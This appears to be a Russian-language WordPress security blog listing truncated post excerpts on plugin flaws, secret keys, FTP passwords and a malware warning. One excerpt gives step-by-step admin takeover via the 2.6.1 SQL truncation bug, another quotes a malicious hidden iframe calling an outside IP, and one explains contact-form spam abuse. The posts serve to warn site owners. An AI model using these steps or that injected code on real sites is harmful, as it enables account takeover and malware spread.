Уязвимости в плагинах Media Holder и e-Commerce
Найдены уязвимости в Wordpress-плагинах Media Holder и E-Commerce.
На обе уязвимости уже выпущены эксплоиты, которые могут использоваться для нарушения безопасности Вашего блога.
Плагин Media Holder предназначен для размещения в блоге различных медиа-данных, видео, аудио и тп.
Плагин e-Commerce используется для создания интернет-магазина на основе вашего Wordpress-блога.
Уязвимость в плагине Wordpress Media Holder связана с ошибкой обработки данных при работе [...]
Уязвимость усечения данных в SQL Wordpress 2.6.1
Найдена новая уязвимость в Wordpress 2.6.1 которая заключается в ошибке усечения данных в базе SQL.
Идем по ссылке server.com/wp-login.php?action=register
Регистрируемся как пользователь "admin x" и Ваш email
Логин выглядит как admin[55 пробелов]х
После регистрации дубликата логина администратора, идем по ссылке восстановления пароля: server.com/wp-login.php?action=lostpassword
В форме восстановления пароля вводим email на который регистрировали дубликат логина администратора.
Получаем письмо с ссылкой на сброс [...]
Уязвимости в Contact Form ][ для Wordpress
Найдена уязвимость в плагинах контактной формы Wordpress - Contact Form версии 2.0.13 и ниже.
Плохая защита от ботов: отсутствие капчи, позволяет спам-ботам отправлять неограниченное количество спам-сообщений администратору сайта.
Использование функционала для рассылки спама: в форме контактов есть поле которое называется "Отправить копию самому себе", это настраивается в настройках плагина (CarbonCopy Ability), используя это поле, спам можно отправлять [...]
Секретные ключи в Wordpress 2.6
Продолжая тему о уязвимости секретного ключа в файле конфигурации Wordpress, хочу обратить ваше внимание на то, что в новой версии Wordpress 2.6, кроме строчки “SECRET_KEY“ есть еще две, на которые также необходимо обращать внимание при установке или обновлении Wordpress блога.
Строчки эти выглядят вот так:
define('AUTH_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу.
define('SECURE_AUTH_KEY', 'впишите сюда [...]
Внимание вирус!
Вчера на одном из сайтов заказчиков, был обнаружен код, который определяется Google как вирусный код, все сайты которые содержат эту строчку, попадают сразу в категорию опасных сайтов, поэтому будьте внимательны и проверьте файлы своего сайта и посты, на наличие подобного кода.
<!-- Traffic Statistics --> <iframe src=хттп://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->
Если у [...]
Wordpress 2.6 - еще больше безопасности
Вышла новая версия лучшего движка для блогов - Wordpress 2.6. В новой версии исправлено очень много ошибок и уязвимостей, а также проделано много работы для повышения безопасности блога.
Теперь после установки Wordpress на новый блог, по умолчанию протокол удаленной работы с блогом XML-RPC отключен, до тех пор, пока администратор блога не активирует его в настройках. Теоритически [...]
Уязвимость секретного ключа в wordpress 2.5
Очень важно при обновлении или установке Wordpress обратить внимание на параметр "SECRET_KEY", с этим параметром связана безопасность паролей в вашем блоге.
В новых версиях Wordpress этот ключ стали использовать для усиления алгоритма криптования паролей md5, поэтому очень важно иметь в качестве этого параметра какую-то длинную строчку с различными символами, дабы усложнить процесс расшифровки вашего пароля, если [...]
Обновлен плагин wp-no-version
Плагин предназначен для осложнения идентификации версии WordPress которая установлена на вашем блоге.
В последнем релизе, плагин не убирает отображение версии WordPress для зарегистрированных пользователей. Это было сделано, для поддержки функции автоматической проверки обновлений WordPress.
Скачать свежую версию плагина можно здесь.
Работоспособность плагина, проверена на WordPress 2.3.3.
Не сохраняйте пароли в ФТП программах.
Если вы самостоятельно работаете с файлами вашего блога, наверняка для удобства вы используете FTP протокол, и какую-нибудь программу для работы с ним, например Total Commander или другие программы для работы с FTP.
Как правило такие программы, опять же для удобства, дают возможность пользователю сохранить пароль, на доступ к серверу, что бы не вводить его при каждом [...]
Гостевой пост в блоге Антона Попова.
Вчера был размещен мой гостевой пост, на тему "Безопасность блогов WordPress" в блоге Антона Попова. Если вы совсем недавно заинтересовались безопасностью своего блога, обязательно ознакомьтесь.
В дальнейшем планируется более подробно рассмотреть все пункты по увеличению безопасности вашего блога, так что подписывайтесь на RSS и ждите обновлений.
